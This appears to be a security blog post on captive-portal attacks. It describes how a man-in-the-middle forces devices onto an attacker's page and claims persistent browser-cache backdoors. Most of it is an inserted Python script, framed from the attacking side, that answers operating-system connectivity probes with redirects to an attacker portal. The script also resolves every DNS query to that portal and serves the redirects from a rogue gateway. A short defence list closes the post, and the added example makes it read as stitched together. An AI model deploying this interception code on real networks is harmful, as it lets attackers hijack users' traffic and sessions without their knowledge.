
Captive portal attack!


A captive portal is a web page accessed with a web browser that is displayed to newly connected users of a Wi-Fi or wired network before they are granted broader access to network resources. Captive portals are commonly used to present a landing or log-in page which may require authentication, payment, acceptance of an end-user license agreement, acceptable use policy, survey completion, or other valid credentials that both the host and user agree to adhere by. Captive portals are used for a broad range of mobile and pedestrian broadband services – including cable and commercially provided Wi-Fi and home hotspots. A captive portal can also be used to provide access to enterprise or residential wired networks, such as apartment houses, hotel rooms, and business centers.

Source: Wikipedia

There is more than one way to implement a captive portal, for example:

  • HTTP redirect (the gateway answers the client's first plain-HTTP request with a redirect to the portal page)
  • ICMP redirect
  • DNS redirect (every name resolves to the portal's address until the client is authorized)

On the attacking side this works well if we are in a MITM position and run a script that intercepts every request, including the OS's captive-portal connectivity check, and answers it with a redirect so the device is forced to open our page. That page then:

  • hijacks all Internet traffic from the machine;
  • installs a persistent web-based backdoor in the browser's HTTP cache for hundreds of thousands of domains and common JavaScript CDN URLs, with access to the user's cookies, via cache poisoning;
  • lets the attacker remotely force the user to make HTTP requests (GET and POST) with the user's cookies on any backdoored domain and proxies the responses back;
  • does not require the machine to be unlocked;
  • keeps the backdoors and remote access working even after the MITM has stopped.

Operating systems affected by this attack:

  • Windows
  • macOS
  • iOS (iPhone)
  • Android
  • Linux
  • the AP/router itself
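As an added example (not code from the original post, and not a tool the post describes), here is a Python sketch of the interception side: a table of the well-known connectivity-check URLs each OS fetches and the reply it expects on a clean network, a responder that answers those probes with an HTTP redirect to the attacker's portal (the "HTTP redirect" method above), a builder for the "DNS redirect" variant that resolves every A query to the portal address, and a client-side check that tells whether a probe reply has been tampered with. It assumes the attacker already holds a MITM position (rogue AP, ARP or DHCP spoofing) so that the probes reach it; the portal address 10.0.0.1, the portal URL and the helper names are hypothetical.

```python
"""Captive-portal probe interception: added illustration, not code from the post."""
import socket
import struct
from dataclasses import dataclass
from http.server import BaseHTTPRequestHandler, HTTPServer


@dataclass(frozen=True)
class Probe:
    os: str
    host: str
    path: str
    status: int   # status a clean network returns
    body: bytes   # body a clean network returns


# Well-known connectivity-check endpoints and the reply each client expects.
PROBES = [
    Probe("windows", "www.msftconnecttest.com", "/connecttest.txt", 200, b"Microsoft Connect Test"),
    Probe("windows-legacy", "www.msftncsi.com", "/ncsi.txt", 200, b"Microsoft NCSI"),
    Probe("apple", "captive.apple.com", "/hotspot-detect.html", 200,
          b"<HTML><HEAD><TITLE>Success</TITLE></HEAD><BODY>Success</BODY></HTML>"),
    Probe("android", "connectivitycheck.gstatic.com", "/generate_204", 204, b""),
    Probe("firefox", "detectportal.firefox.com", "/success.txt", 200, b"success"),
]


def match_probe(host, path):
    """Return the Probe a request corresponds to, or None for ordinary traffic."""
    host = host.split(":")[0].lower()          # drop a :port suffix if present
    for p in PROBES:
        if p.host == host and p.path == path:
            return p
    return None


def attacker_response(host, path, portal_url):
    """MITM side: answer a connectivity probe with a 302 to the portal so the OS
    decides it is behind a captive portal and opens portal_url in its pop-up
    browser. Returns (status, headers, body), or None for non-probe traffic,
    which a real interceptor would proxy upstream untouched."""
    if match_probe(host, path) is None:
        return None
    return 302, {"Location": portal_url, "Cache-Control": "no-store"}, b""


def looks_intercepted(probe, status, body):
    """Client side: True if a probe reply differs from the clean-network answer,
    i.e. something between the device and the Internet is rewriting it."""
    return not (status == probe.status and body.strip() == probe.body.strip())


def dns_query(name, txid=0x1234):
    """Build a minimal A query (used here only to feed dns_redirect_reply)."""
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split("."))
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + b"\x00" + struct.pack("!HH", 1, 1)


def dns_redirect_reply(query, portal_ip, ttl=0):
    """'DNS redirect' variant: answer every A query with portal_ip. Parses only
    the header and the first question, echoes it, and appends one A record that
    names the question via a compression pointer (0xC00C)."""
    txid, _flags, qdcount = struct.unpack("!HHH", query[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    i = 12
    while query[i] != 0:                       # walk the QNAME labels
        i += query[i] + 1
    i += 1
    qtype, qclass = struct.unpack("!HH", query[i:i + 4])
    question = query[12:i + 4]
    is_a = qtype == 1 and qclass == 1
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1 if is_a else 0, 0, 0)
    if not is_a:
        return header + question               # NOERROR with no answer for non-A queries
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(portal_ip)
    return header + question + answer


class ProbeHandler(BaseHTTPRequestHandler):
    portal_url = "http://10.0.0.1/portal"      # hypothetical attacker portal

    def do_GET(self):
        resp = attacker_response(self.headers.get("Host", ""), self.path, self.portal_url)
        if resp is None:
            self.send_error(404)               # stand-in for "proxy upstream"
            return
        status, headers, body = resp
        self.send_response(status)
        for k, v in headers.items():
            self.send_header(k, v)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def serve(bind="0.0.0.0", port=80, portal_url=ProbeHandler.portal_url):
    """Run the probe responder; assumes the probes already reach us (rogue AP, ARP/DHCP spoofing)."""
    ProbeHandler.portal_url = portal_url
    HTTPServer((bind, port), ProbeHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

`serve()` binds port 80 and so needs root on the rogue gateway; the ICMP-redirect variant is not shown. The redirect alone only opens the pop-up browser on the portal page; the cache-poisoning payload the list above describes lives in that page and is not part of this example. `looks_intercepted` is the same comparison each OS makes internally, which is exactly why a 302 in place of the expected body triggers the captive-portal pop-up, and it is also a quick way for a defender to tell that a network is rewriting the connectivity checks.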

On the defense side you have to:

  • Stop using public Wi-Fi.
  • Always use a VPN, keeping in mind that the captive-portal pop-up itself runs before the tunnel is up, so whatever the device sends in that window is not protected.
  • Disable automatic captive-portal detection on the device, so the system no longer opens a browser on whatever answers its connectivity check.

These steps reduce your exposure to this kind of attack but do not eliminate it: the attacker still sits between you and the network.